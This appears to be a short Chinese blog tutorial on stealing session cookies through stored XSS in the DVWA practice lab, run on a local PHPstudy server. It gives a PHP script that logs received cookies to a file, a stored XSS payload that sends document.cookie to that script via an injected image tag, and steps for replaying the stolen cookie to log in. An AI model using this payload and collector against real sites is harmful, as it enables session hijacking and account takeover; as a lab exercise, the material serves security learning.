利用XSS漏洞获取cookie
实验环境:
- PHPstudy
- 火狐浏览器、IE
- DVWA靶场
实验准备:
在www目录下创建一个名为1.php的文件,内容如下:
<?php
$file = fopen("1.txt","a");
if($_GET['cookie']){
$cookie = $_GET['cookie'];
fputs ($file,"$cookie\n");
}
?>
模拟实验:
1、把级别调成low,选择Stored储存型
将<script>document.body.innerHTML += "<img src='http://localhost/1.php?cookie="+document.cookie+"'>";</script>输入到留言框中保存
在同目录下会生成1.txt文件,里面为成功登录的cookie
换个浏览器将cookie值改成文件中的值,然后把url改成index.php
登录成功
学而不思则罔,思而不学则殆
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 无需6万激活码!GitHub神秘组织3小时极速复刻Manus,手把手教你使用OpenManus搭建本
· C#/.NET/.NET Core优秀项目和框架2025年2月简报
· Manus爆火,是硬核还是营销?
· 一文读懂知识蒸馏
· 终于写完轮子一部分:tcp代理 了,记录一下